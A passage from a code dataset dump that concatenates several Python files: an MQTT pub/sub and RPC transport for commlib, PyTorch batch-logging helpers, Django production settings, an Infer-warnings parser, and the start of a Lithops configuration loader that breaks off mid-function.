Linked_list/insert_at_ithPosition_recursive.py","file_name":"insert_at_ithPosition_recursive.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"645481301","text":"\"\"\"\nMQTT Implementation\n\"\"\"\n\nimport datetime\nimport functools\nimport json\nimport time\nfrom enum import IntEnum\nfrom typing import Dict, Any, Tuple\n\nimport paho.mqtt.client as mqtt\n\nfrom commlib.action import (BaseActionClient, BaseActionService,\n _ActionCancelMessage, _ActionFeedbackMessage,\n _ActionGoalMessage, _ActionResultMessage,\n _ActionStatusMessage)\nfrom commlib.events import BaseEventEmitter, Event\nfrom commlib.exceptions import RPCClientTimeoutError, SubscriberError\nfrom commlib.logger import Logger\nfrom commlib.msg import PubSubMessage, RPCMessage, Object, DataField, DataClass\nfrom commlib.utils import gen_timestamp\nfrom commlib.pubsub import BasePublisher, BaseSubscriber\nfrom commlib.rpc import BaseRPCClient, BaseRPCService\nfrom commlib.serializer import JSONSerializer\n\n\n@DataClass\nclass CommObjectHeaderProps(Object):\n \"\"\"CommObjectHeaderProps.\n \"\"\"\n\n content_type: str = DataField(default='application/json')\n content_encoding: str = DataField(default='utf8')\n\n\n@DataClass\nclass CommPubSubHeader(Object):\n timestamp: int = DataField(default=gen_timestamp())\n properties: CommObjectHeaderProps = DataField(\n default_factory=CommObjectHeaderProps)\n\n\n@DataClass\nclass CommPubSubObject(Object):\n header: CommPubSubHeader = DataField(default_factory=CommPubSubHeader)\n data: Dict[str, Any] = DataField(default_factory=dict)\n\n\n@DataClass\nclass CommRPCHeader(Object):\n timestamp: int = DataField(default=gen_timestamp())\n reply_to: str = DataField(default='')\n properties: CommObjectHeaderProps = DataField(\n default_factory=CommObjectHeaderProps)\n\n\n@DataClass\nclass CommRPCObject(Object):\n header: CommRPCHeader = DataField(default_factory=CommRPCHeader)\n data: Dict[str, Any] = DataField(default_factory=dict)\n\n\n@DataClass\nclass 
CommEventHeader(Object):\n timestamp: int = DataField(default=gen_timestamp())\n properties: CommObjectHeaderProps = DataField(\n default_factory=CommObjectHeaderProps)\n\n\n@DataClass\nclass CommEventObject(Object):\n header: CommEventHeader = DataField(default_factory=CommEventHeader)\n data: Dict[str, Any] = DataField(default_factory=dict)\n\n\nclass MQTTReturnCode(IntEnum):\n CONNECTION_SUCCESS = 0\n INCORRECT_PROTOCOL_VERSION = 1\n INVALID_CLIENT_ID = 2\n SERVER_UNAVAILABLE = 3\n AUTHENTICATION_ERROR = 4\n AUTHORIZATION_ERROR = 5\n\n\nclass MQTTProtocolType(IntEnum):\n MQTTv31 = 1\n MQTTv311 = 2\n\n\nclass Credentials:\n def __init__(self, username: str = '', password: str = ''):\n self.username = username\n self.password = password\n\n\nclass ConnectionParameters:\n __slots__ = ['host', 'port', 'creds', 'protocol']\n def __init__(self,\n host: str = 'localhost',\n port: int = 1883,\n protocol: MQTTProtocolType = MQTTProtocolType.MQTTv311,\n creds: Credentials = Credentials()):\n \"\"\"__init__.\n\n Args:\n host (str): host\n port (int): port\n protocol (MQTTProtocolType): protocol\n creds (Credentials): creds\n \"\"\"\n self.host = host\n self.port = port\n self.protocol = protocol\n self.creds = creds\n\n @property\n def credentials(self):\n return self.creds\n\n\nclass MQTTTransport:\n \"\"\"MQTTTransport.\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = ConnectionParameters(),\n logger: Logger = None):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n logger (Logger): logger\n \"\"\"\n self._conn_params = conn_params\n self._logger = logger\n self._connected = False\n\n self.logger = Logger(self.__class__.__name__) if \\\n logger is None else logger\n\n self._client = mqtt.Client(clean_session=True,\n protocol=mqtt.MQTTv311,\n transport='tcp')\n\n self._client.on_connect = self.on_connect\n self._client.on_disconnect = self.on_disconnect\n # self._client.on_log = self.on_log\n self._client.on_message = self.on_message\n\n self._client.username_pw_set(self._conn_params.creds.username,\n self._conn_params.creds.password)\n\n self._client.connect(self._conn_params.host, self._conn_params.port, 60)\n\n @property\n def is_connected(self):\n return self._connected\n\n def on_connect(self, client, userdata, flags, rc):\n if rc == MQTTReturnCode.CONNECTION_SUCCESS:\n self.logger.info(\n f\"Connected to MQTT broker <{self._conn_params.host}:{self._conn_params.port}>\")\n self._connected = True\n\n def on_disconnect(self, client, userdata, rc):\n if rc != 0:\n self.logger.warn(\"Unexpected disconnection from MQTT Broker.\")\n\n def on_message(self, client, userdata, msg):\n raise NotImplementedError()\n\n def on_log(self, client, userdata, level, buf):\n ## SPAM output\n # self.logger.debug(f'MQTT Log: {buf}')\n pass\n\n def publish(self, topic: str,\n payload: Dict[str, Any],\n qos: int = 0,\n retain: bool = False,\n confirm_delivery: bool = False):\n topic = topic.replace('.', '/')\n ph = self._client.publish(topic, payload, qos=qos, retain=retain)\n if confirm_delivery:\n ph.wait_for_publish()\n\n def subscribe(self, topic: str, callback: callable, qos: int = 0):\n ## Adds subtopic specific callback handlers\n topic = topic.replace('.', '/').replace('*', '#')\n self._client.subscribe(topic, qos)\n self._client.message_callback_add(topic, callback)\n\n def start_loop(self):\n self._client.loop_start()\n\n def stop_loop(self):\n self._client.loop_stop(force=True)\n\n def loop_forever(self):\n self._client.loop_forever()\n\n\nclass 
Publisher(BasePublisher):\n \"\"\"Publisher.\n MQTT Publisher\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = ConnectionParameters(),\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n args: See BasePublisher\n kwargs: See BasePublisher\n \"\"\"\n self._msg_seq = 0\n self.conn_params = conn_params\n super().__init__(*args, **kwargs)\n self._transport = MQTTTransport(conn_params=conn_params,\n logger=self._logger)\n self._transport.start_loop()\n self._comm_obj = CommPubSubObject()\n self._comm_obj.header.properties.content_type = \\\n self._serializer.CONTENT_TYPE #pylint: disable=E1101\n self._comm_obj.header.properties.content_encoding = \\\n self._serializer.CONTENT_ENCODING #pylint: disable=E1101\n\n def publish(self, msg: PubSubMessage) -> None:\n \"\"\"publish.\n\n Args:\n msg (PubSubMessage): Message to Publish\n\n Returns:\n None:\n \"\"\"\n if self._msg_type is None:\n data = msg\n else:\n data = msg.as_dict()\n _msg = self._prepare_msg(data)\n _msg = self._serializer.serialize(_msg)\n self.logger.debug(f'Publishing Message to topic <{self._topic}>')\n self._transport.publish(self._topic, _msg)\n self._msg_seq += 1\n\n def _prepare_msg(self, data: Dict[str, Any]):\n \"\"\"_prepare_msg.\n Wraps in comm message. Includes header and data payload\n\n Args:\n data (Dict[str, Any]): data\n \"\"\"\n self._comm_obj.header.timestamp = gen_timestamp() #pylint: disable=E0237\n self._comm_obj.data = data\n return self._comm_obj.as_dict()\n\n\nclass MPublisher(Publisher):\n \"\"\"MPublisher.\n Multi-Topic Publisher\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(MPublisher, self).__init__(topic='*', *args, **kwargs)\n\n def publish(self, msg: PubSubMessage, topic: str) -> None:\n \"\"\"publish.\n\n Args:\n msg (PubSubMessage): msg\n topic (str): topic\n\n Returns:\n None:\n \"\"\"\n if self._msg_type is None:\n data = msg\n else:\n data = msg.as_dict()\n _msg = self._prepare_msg(data)\n _msg = self._serializer.serialize(_msg)\n self._transport.publish(topic, _msg)\n self._msg_seq += 1\n\n\nclass Subscriber(BaseSubscriber):\n \"\"\"Subscriber.\n MQTT Subscriber\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = ConnectionParameters(),\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n args: See BaseSubscriber\n kwargs: See BaseSubscriber\n \"\"\"\n self.conn_params = conn_params\n super(Subscriber, self).__init__(*args, **kwargs)\n self._transport = MQTTTransport(conn_params=conn_params,\n logger=self._logger)\n self._topic = self._validate_uri(self._topic)\n\n def _validate_uri(self, uri):\n # Use PSubscriber for pattern-based subscription\n if '.' in uri:\n self.logger.warn(\n 'Found \".\" character in topic definition. 
Replacing with \"/\"')\n uri = uri.replace('.', '/')\n return uri\n\n def run(self):\n self._transport.subscribe(self._topic,\n self._on_message)\n self._transport.start_loop()\n self.logger.info(f'Started Subscriber: <{self._topic}>')\n\n def run_forever(self):\n self._transport.subscribe(self._topic,\n self._on_message)\n self.logger.info(f'Started Subscriber: <{self._topic}>')\n self._transport.loop_forever()\n\n def _on_message(self, client, userdata, msg):\n try:\n data, header, uri = self._unpack_comm_msg(msg)\n if self._topic != uri:\n raise SubscriberError('Subscribed topic does not match!!')\n if self.onmessage is not None:\n if self._msg_type is None:\n _clb = functools.partial(self.onmessage, data)\n else:\n _clb = functools.partial(self.onmessage,\n self._msg_type(**data))\n _clb()\n except Exception:\n self.logger.error('Exception caught in _on_message', exc_info=True)\n\n def _unpack_comm_msg(self, msg: Dict[str, Any]) -> Tuple:\n _uri = msg.topic\n _payload = JSONSerializer.deserialize(msg.payload)\n _data = _payload['data']\n _header = _payload['header']\n return _data, _header, _uri\n\n\nclass PSubscriber(Subscriber):\n \"\"\"PSubscriber.\n \"\"\"\n\n def _on_message(self, client, userdata, msg):\n try:\n data, header, topic = self._unpack_comm_msg(msg)\n if self.onmessage is not None:\n if self._msg_type is None:\n _clb = functools.partial(self.onmessage,\n data,\n topic)\n else:\n _clb = functools.partial(self.onmessage,\n self._msg_type(**data),\n topic)\n _clb()\n except Exception:\n self.logger.error('Exception caught in _on_message', exc_info=True)\n\n\nclass RPCService(BaseRPCService):\n \"\"\"RPCService.\n MQTT RPC Service class.\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = None,\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n args: See BaseRPCService\n kwargs: See BaseRPCService\n \"\"\"\n self.conn_params = conn_params\n super(RPCService, self).__init__(*args, **kwargs)\n self._transport = MQTTTransport(conn_params=conn_params,\n logger=self._logger)\n self._comm_obj = CommRPCObject()\n self._comm_obj.header.properties.content_type = \\\n self._serializer.CONTENT_TYPE #pylint: disable=E1101\n self._comm_obj.header.properties.content_encoding = \\\n self._serializer.CONTENT_ENCODING #pylint: disable=E1101\n\n def _send_response(self, data: dict, reply_to: str):\n self._comm_obj.header.timestamp = gen_timestamp() #pylint: disable=E0237\n self._comm_obj.data = data\n _resp = self._comm_obj.as_dict()\n _resp = self._serializer.serialize(_resp)\n self._transport.publish(reply_to, _resp)\n\n def _on_request_internal(self, client, userdata, msg):\n try:\n data, header, uri = self._unpack_comm_msg(msg)\n if self._msg_type is None:\n resp = self.on_request(data)\n else:\n resp = self.on_request(self._msg_type.Request(**data))\n ## RPCMessage.Response object here\n resp = resp.as_dict()\n except Exception as exc:\n self.logger.error(str(exc), exc_info=False)\n resp = {}\n reply_to = header['reply_to']\n self._send_response(resp, reply_to)\n\n def _unpack_comm_msg(self, msg: Dict[str, Any]) -> Tuple:\n _uri = msg.topic\n _payload = JSONSerializer.deserialize(msg.payload)\n _data = _payload['data']\n _header = _payload['header']\n return _data, _header, _uri\n\n def run_forever(self):\n \"\"\"run_forever.\n \"\"\"\n self._transport.subscribe(self._rpc_name,\n self._on_request_internal)\n self._transport.start_loop()\n while True:\n if self._t_stop_event is not None:\n if 
self._t_stop_event.is_set():\n self.logger.debug('Stop event caught in thread')\n break\n time.sleep(0.001)\n self._transport.stop_loop()\n\n def stop(self):\n self._t_stop_event.set()\n\n\nclass RPCClient(BaseRPCClient):\n \"\"\"RPCClient.\n MQTT RPC Client\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = None,\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n args: See BaseRPCClient\n kwargs: See BaseRPCClient\n \"\"\"\n self.conn_params = conn_params\n self._response = None\n\n super(RPCClient, self).__init__(*args, **kwargs)\n self._transport = MQTTTransport(conn_params=conn_params,\n logger=self._logger)\n self._transport.start_loop()\n self._comm_obj = CommRPCObject()\n self._comm_obj.header.properties.content_type = \\\n self._serializer.CONTENT_TYPE #pylint: disable=E1101\n self._comm_obj.header.properties.content_encoding = \\\n self._serializer.CONTENT_ENCODING #pylint: disable=E1101\n\n def _gen_queue_name(self):\n return f'rpc-{self._gen_random_id()}'\n\n def _prepare_request(self, data):\n self._comm_obj.header.timestamp = gen_timestamp() #pylint: disable=E0237\n self._comm_obj.header.reply_to = self._gen_queue_name()\n self._comm_obj.data = data\n return self._comm_obj.as_dict()\n\n def _on_response_wrapper(self, client, userdata, msg):\n try:\n data, header, uri = self._unpack_comm_msg(msg)\n except Exception as exc:\n self.logger.error(exc, exc_info=True)\n data = {}\n self._response = data\n\n def _unpack_comm_msg(self, msg: Dict[str, Any]) -> Tuple:\n _uri = msg.topic\n _payload = JSONSerializer.deserialize(msg.payload)\n _data = _payload['data']\n _header = _payload['header']\n return _data, _header, _uri\n\n def _wait_for_response(self, timeout: float = 10.0):\n \"\"\"_wait_for_response.\n\n Args:\n timeout (float): timeout\n \"\"\"\n start_t = time.time()\n while self._response is None:\n elapsed_t = time.time() - start_t\n if elapsed_t >= timeout:\n raise RPCClientTimeoutError(\n f'Response timeout after {timeout} seconds')\n time.sleep(0.001)\n return self._response\n\n def call(self, msg: RPCMessage.Request,\n timeout: float = 30) -> RPCMessage.Response:\n \"\"\"call.\n\n Args:\n msg (RPCMessage.Request): msg\n timeout (float): timeout\n\n Returns:\n RPCMessage.Response:\n \"\"\"\n ## TODO: Evaluate msg type passed here.\n if self._msg_type is None:\n data = msg\n else:\n data = msg.as_dict()\n\n self._response = None\n\n _msg = self._prepare_request(data)\n _reply_to = _msg['header']['reply_to']\n _msg = self._serializer.serialize(_msg)\n\n self._transport.subscribe(_reply_to, callback=self._on_response_wrapper)\n start_t = time.time()\n self._transport.publish(self._rpc_name, _msg)\n _resp = self._wait_for_response(timeout=timeout)\n elapsed_t = time.time() - start_t\n self._delay = elapsed_t\n\n if self._msg_type is None:\n return _resp\n else:\n return self._msg_type.Response(**_resp)\n\n\nclass ActionService(BaseActionService):\n \"\"\"ActionService.\n MQTT Action Server\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = ConnectionParameters(),\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n args: See BaseActionService\n kwargs: See BaseActionService\n \"\"\"\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): conn_params\n args:\n kwargs:\n \"\"\"\n super(ActionService, self).__init__(*args, **kwargs)\n\n self._goal_rpc = RPCService(msg_type=_ActionGoalMessage,\n rpc_name=self._goal_rpc_uri,\n 
conn_params=conn_params,\n on_request=self._handle_send_goal,\n logger=self._logger,\n debug=self.debug)\n self._cancel_rpc = RPCService(msg_type=_ActionCancelMessage,\n rpc_name=self._cancel_rpc_uri,\n conn_params=conn_params,\n on_request=self._handle_cancel_goal,\n logger=self._logger,\n debug=self.debug)\n self._result_rpc = RPCService(msg_type=_ActionResultMessage,\n rpc_name=self._result_rpc_uri,\n conn_params=conn_params,\n on_request=self._handle_get_result,\n logger=self._logger,\n debug=self.debug)\n self._feedback_pub = Publisher(msg_type=_ActionFeedbackMessage,\n topic=self._feedback_topic,\n conn_params=conn_params,\n logger=self._logger,\n debug=self.debug)\n self._status_pub = Publisher(msg_type=_ActionStatusMessage,\n topic=self._status_topic,\n conn_params=conn_params,\n logger=self._logger,\n debug=self.debug)\n\n\nclass ActionClient(BaseActionClient):\n \"\"\"ActionClient.\n MQTT Action Client\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = ConnectionParameters(),\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): Broker Connection Parameters\n args: See BaseActionClient\n kwargs: See BaseActionClient\n \"\"\"\n super(ActionClient, self).__init__(*args, **kwargs)\n\n self._goal_client = RPCClient(msg_type=_ActionGoalMessage,\n rpc_name=self._goal_rpc_uri,\n conn_params=conn_params,\n logger=self._logger,\n debug=self.debug)\n self._cancel_client = RPCClient(msg_type=_ActionCancelMessage,\n rpc_name=self._cancel_rpc_uri,\n conn_params=conn_params,\n logger=self._logger,\n debug=self.debug)\n self._result_client = RPCClient(msg_type=_ActionResultMessage,\n rpc_name=self._result_rpc_uri,\n conn_params=conn_params,\n logger=self._logger,\n debug=self.debug)\n self._status_sub = Subscriber(msg_type=_ActionStatusMessage,\n conn_params=conn_params,\n topic=self._status_topic,\n on_message=self._on_status)\n self._feedback_sub = Subscriber(msg_type=_ActionFeedbackMessage,\n conn_params=conn_params,\n topic=self._feedback_topic,\n on_message=self._on_feedback)\n self._status_sub.run()\n self._feedback_sub.run()\n\n\nclass EventEmitter(BaseEventEmitter):\n \"\"\"EventEmitter.\n MQTT Event Emitter class\n \"\"\"\n\n def __init__(self,\n conn_params: ConnectionParameters = None,\n *args, **kwargs):\n \"\"\"__init__.\n\n Args:\n conn_params (ConnectionParameters): Broker Connection Parameters\n args: See BaseEventEmitter\n kwargs: See BaseEventEmitter\n \"\"\"\n super(EventEmitter, self).__init__(*args, **kwargs)\n\n self._transport = MQTTTransport(conn_params=conn_params,\n logger=self._logger)\n self._transport.start_loop()\n self._comm_obj = CommEventObject()\n self._comm_obj.header.properties.content_type = \\\n self._serializer.CONTENT_TYPE #pylint: disable=E1101\n self._comm_obj.header.properties.content_encoding = \\\n self._serializer.CONTENT_ENCODING #pylint: disable=E1101\n\n def send_event(self, event: Event) -> None:\n \"\"\"send_event.\n\n Args:\n event (Event): The Event to send.\n\n Returns:\n None:\n \"\"\"\n _msg = event.as_dict()\n _msg = self._prepare_msg(_msg)\n _msg = self._serializer.serialize(_msg)\n self.logger.debug(f'Firing Event: {event.name}:<{event.uri}>')\n self._transport.publish(event.uri, _msg)\n\n def _prepare_msg(self, data: Dict[str, Any]) -> None:\n \"\"\"_prepare_msg.\n\n Args:\n data (Dict[str, Any]): data\n\n Returns:\n None:\n \"\"\"\n self._comm_obj.header.timestamp = gen_timestamp() #pylint: disable=E0237\n self._comm_obj.data = data\n return 
self._comm_obj.as_dict()\n","sub_path":"commlib/transports/mqtt.py","file_name":"mqtt.py","file_ext":"py","file_size_in_byte":23795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333522841","text":"import os\nimport torchvision\nimport torch\nfrom train_utils import *\n\n\ndef write_out_transforms(config):\n for transform in config[\"train_transforms\"]:\n config[str(transform).split('(')[0]] = transform\n for transform in config[\"val_transforms\"]:\n config[str(transform).split('(')[0]] = transform\n\ndef save_batch_as_image(X_batch, Y_batch, outputs, seen_train_ex, label, other_logdir, num_rows_to_plot=3):\n save_batch = False\n np_grid = []\n num_rows_to_plot = min(X_batch.size(0), num_rows_to_plot)\n\n for i in range(num_rows_to_plot):\n input_img = X_batch[i].cpu().float()\n #input_img = torch.cat([input_img, input_img, input_img])\n mask = predb_to_mask(outputs.clone(), i)\n mask = convert_tensor_to_RGB(mask)\n gt = Y_batch[i].cpu()\n gt = convert_tensor_to_RGB(gt)\n np_grid.append(input_img)\n np_grid.append(mask)\n np_grid.append(gt)\n\n grid = torchvision.utils.make_grid(np_grid, nrow=num_rows_to_plot)\n #grid = torchvision.transforms.functional.resize(grid, 256)\n save_dir = os.path.join(other_logdir, label)\n os.makedirs(save_dir, exist_ok=True)\n save_path = os.path.join(save_dir, f'{format(seen_train_ex, \"09d\")}.png')\n\n torchvision.utils.save_image(grid,save_path)\n return save_batch\n\n\ndef save_batch_tensorboard(X_batch, Y_batch, outputs, seen_train_ex, tb_writer, label, num_rows_to_plot=3):\n save_batch = False\n np_grid = []\n num_rows_to_plot = min(X_batch.size(0), num_rows_to_plot)\n\n for i in range(num_rows_to_plot):\n input_img = X_batch[i].cpu().float()\n input_img = torch.cat([input_img, input_img, input_img])\n mask = predb_to_mask(outputs.clone(), i)\n mask = convert_tensor_to_RGB(mask)\n gt = Y_batch[i].cpu()\n gt = convert_tensor_to_RGB(gt)\n np_grid.append(input_img)\n np_grid.append(mask)\n np_grid.append(gt)\n\n grid = torchvision.utils.make_grid(np_grid, nrow=num_rows_to_plot)\n #grid = torchvision.transforms.functional.resize(grid, 256)\n tb_writer.add_image(label, grid, global_step=seen_train_ex)\n return save_batch\n\n\ndef print_epoch_stats(epoch, epochs, avg_train_loss, avg_train_acc):\n print('Epoch {}/{}'.format(epoch, epochs - 1))\n print('-' * 10)\n print('{} Loss: {:.4f} PxAcc: {}'.format(\"Train\", avg_train_loss, avg_train_acc))\n print('-' * 10)\n\n","sub_path":"machine-learning/ml-projects/stereo-cam-v1/utils/logger_utils.py","file_name":"logger_utils.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208110343","text":"import os\nSECRET_KEY = os.environ.get('SECRET_KEY')\nDEBUG = False\n\nTEMPLATE_DEBUG = False\n\nALLOWED_HOSTS = ['*']\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': os.environ.get('DB_NAME'),\n 'HOST': os.environ.get('DB_HOST'),\n 'PORT': os.environ.get('DB_PORT'),\n 'USER': os.environ.get('DB_USER'),\n 'PASSWORD': os.environ.get('DB_PASSWORD'),\n }\n}\n#EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n#EMAIL_HOST = 'smtp.mxhichina.com'\n#EMAIL_HOST_USER = os.environ.get('EMAIL_USER')\n#EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_PASSWORD')\n#EMAIL_PORT = 465\n#EMAIL_USE_TLS = True\n#SERVER_EMAIL = os.environ.get('EMAIL_USER')\nADMINS = (('Guang Chen', 'cgcgbcbc@163.com'),)\n\nLOGGING = {\n 'version': 1,\n 
'disable_existing_loggers': False,\n 'handlers': {\n 'console': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'propagate': True,\n },\n },\n}\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static').replace('\\\\', '/')\n\nSITE_DOMAIN = os.environ.get('SITE_DOMAIN')\n","sub_path":"urlhandler/urlhandler/settings_production.py","file_name":"settings_production.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"107033132","text":"import operator\nimport os\nimport sys\n\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv\n\n warnings_file = _validate_input(argv)\n with open(warnings_file) as f:\n lines = [line.strip().split(',')[3] for line in f.readlines()]\n warning_dict = {}\n for line in lines:\n if line in warning_dict:\n warning_dict[line] += 1\n else:\n warning_dict[line] = 1\n sorted_x = sorted(warning_dict.items(),\nkey=operator.itemgetter(1))\n\n with open('warnings.txt', 'w+') as f:\n for x in sorted_x:\n f.write('{}\\n'.format(x))\n\n\ndef _validate_input(argv):\n warnings_file = argv[1]\n\n if not os.path.isfile(warnings_file):\n _print_usage()\n sys.exit(1)\n\n return warnings_file\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"scripts/parsers/infer_warnings.py","file_name":"infer_warnings.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"166983779","text":"#\n# (C) Copyright IBM Corp. 2019\n# (C) Copyright Cloudlab URV 2020\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport os\nimport json\nimport importlib\nimport logging\nimport multiprocessing as mp\nimport lithops.constants as constants\nfrom lithops.version import __version__\nfrom lithops.utils import verify_runtime_name\n\nlogger = logging.getLogger(__name__)\n\n\ndef load_yaml_config(config_filename):\n import yaml\n\n with open(config_filename, 'r') as config_file:\n data = yaml.safe_load(config_file)\n\n return data\n\n\ndef dump_yaml_config(config_filename, data):\n import yaml\n if not os.path.exists(os.path.dirname(config_filename)):\n os.makedirs(os.path.dirname(config_filename))\n\n with open(config_filename, \"w\") as config_file:\n yaml.dump(data, config_file, default_flow_style=False)\n\n\ndef get_default_config_filename():\n \"\"\"\n First checks .lithops_config\n then checks LITHOPS_CONFIG_FILE environment variable\n then ~/.lithops/config\n \"\"\"\n if 'LITHOPS_CONFIG_FILE' in os.environ:\n config_filename = os.environ['LITHOPS_CONFIG_FILE']\n\n elif os.path.exists(\".lithops_config\"):\n config_filename = os.path.abspath('.lithops_config')\n\n else:\n config_filename = constants.CONFIG_FILE\n if not os.path.exists(config_filename):\n config_filename = os.path.join(constants.HOME_DIR, '.lithops_config')\n if not os.path.exists(config_filename):\n 
return None\n\n logging.warning('~/.lithops_config is deprecated. Please move your'\n ' configuration file into ~/.lithops/config')\n\n logger.info('Getting configuration from {}'.format(config_filename))\n\n return config_filename\n\n\ndef default_config(config_data=None, config_overwrite={}):\n \"\"\"\n First checks .lithops_config\n then checks LITHOPS_CONFIG_FILE environment variable\n then ~/.lithops/config\n \"\"\"\n logger.info('Lithops v{}'.format(__version__))\n logger.debug(\"Loading configuration\")\n\n if not config_data:\n if 'LITHOPS_CONFIG' in os.environ:\n config_data = json.loads(os.environ.get('LITHOPS_CONFIG'))\n else:\n config_filename = get_default_config_filename()\n if config_filename:\n config_data = load_yaml_config(config_filename)\n else:\n logger.debug(\"No config file found. Running on Localhost mode\")\n config_data = {'lithops': {'mode': constants.LOCALHOST}}\n\n if 'lithops' not in config_data:\n config_data['lithops'] = {}\n\n if 'executor' in config_data['lithops']:\n logging.warning(\"'executor' key in lithopos section is deprecated, use 'mode' key instead\")\n config_data['lithops']['mode'] = config_data['lithops']['executor']\n\n # overwrite values provided by the user\n if 'lithops' in config_overwrite:\n config_data['lithops'].update(config_overwrite['lithops'])\n\n if constants.LOCALHOST in config_overwrite:\n if constants.LOCALHOST not in config_data or \\\n config_data[constants.LOCALHOST] is None:\n config_data[constants.LOCALHOST] = {}\n config_data[constants.LOCALHOST].update(config_overwrite[constants.LOCALHOST])\n\n if constants.SERVERLESS in config_overwrite:\n if constants.SERVERLESS not in config_data or \\\n config_data[constants.SERVERLESS] is None:\n config_data[constants.SERVERLESS] = {}\n config_data[constants.SERVERLESS].update(config_overwrite[constants.SERVERLESS])\n\n if constants.STANDALONE in config_overwrite:\n if constants.STANDALONE not in config_data or \\\n config_data[constants.STANDALONE] is None:\n config_data[constants.STANDALONE] = {}\n config_data[constants.STANDALONE].update(config_overwrite[constants.STANDALONE])\n\n if 'mode' not in config_data['lithops']:\n config_data['lithops']['mode'] = constants.MODE_DEFAULT\n if 'execution_timeout' not in config_data['lithops']:\n config_data['lithops']['execution_timeout'] = constants.EXECUTION_TIMEOUT_DEFAULT\n\n if config_data['lithops']['mode'] == constants.SERVERLESS:\n if 'storage_bucket' not in config_data['lithops']:\n raise Exception(\"storage_bucket is mandatory in \"\n \"lithops section of the configuration\")\n\n if constants.SERVERLESS not in config_data or \\\n config_data[constants.SERVERLESS] is None:\n config_data[constants.SERVERLESS] = {}\n\n if 'backend' not in config_data[constants.SERVERLESS]:\n config_data[constants.SERVERLESS]['backend'] = constants.SERVERLESS_BACKEND_DEFAULT\n\n sb = config_data[constants.SERVERLESS]['backend']\n logger.debug(\"Loading Serverless backend module: {}\".format(sb))\n cb_config = importlib.import_module('lithops.serverless.backends.{}.config'.format(sb))\n cb_config.load_config(config_data)\n\n verify_runtime_name(config_data[constants.SERVERLESS]['runtime'])\n\n elif config_data['lithops']['mode'] == constants.STANDALONE:\n if 'storage_bucket' not in config_data['lithops']:\n raise Exception(\"storage_bucket is mandatory in \"\n \"lithops section of the configuration\")\n\n if constants.STANDALONE not in config_data or \\\n config_data[constants.STANDALONE] is None:\n config_data[constants.STANDALONE] = {}\n\n if 
'auto_dismantle' not in config_data[constants.STANDALONE]:\n config_data[constants.STANDALONE]['auto_dismantle'] = constants.STANDALONE_AUTO_DISMANTLE_DEFAULT\n if 'soft_dismantle_timeout' not in config_data[constants.STANDALONE]:\n config_data[constants.STANDALONE]['soft_dismantle_timeout'] = constants.STANDALONE_SOFT_DISMANTLE_TIMEOUT_DEFAULT\n if 'hard_dismantle_timeout' not in config_data[constants.STANDALONE]:\n config_data[constants.STANDALONE]['hard_dismantle_timeout'] = constants.STANDALONE_HARD_DISMANTLE_TIMEOUT_DEFAULT\n if 'backend' not in config_data[constants.STANDALONE]:\n config_data[constants.STANDALONE]['backend'] = constants.STANDALONE_BACKEND_DEFAULT\n if 'runtime' not in config_data[constants.STANDALONE]:\n config_data[constants.STANDALONE]['runtime'] = constants.STANDALONE_RUNTIME_DEFAULT\n\n sb = config_data['standalone']['backend']\n logger.debug(\"Loading Standalone backend module: {}\".format(sb))\n sb_config = importlib.import_module('lithops.standalone.backends.{}.config'.format(sb))\n sb_config.load_config(config_data)\n\n verify_runtime_name(config_data[constants.STANDALONE]['runtime'])\n\n elif config_data['lithops']['mode'] == constants.LOCALHOST:\n if 'storage' not in config_data['lithops']:\n config_data['lithops']['storage'] = 'localhost'\n config_data['lithops']['storage_bucket'] = 'storage'\n\n if 'workers' not in config_data['lithops']:\n config_data['lithops']['workers'] = mp.cpu_count()\n\n if constants.LOCALHOST not in config_data or \\\n config_data[constants.LOCALHOST] is None:\n config_data[constants.LOCALHOST] = {}\n\n if 'runtime' not in 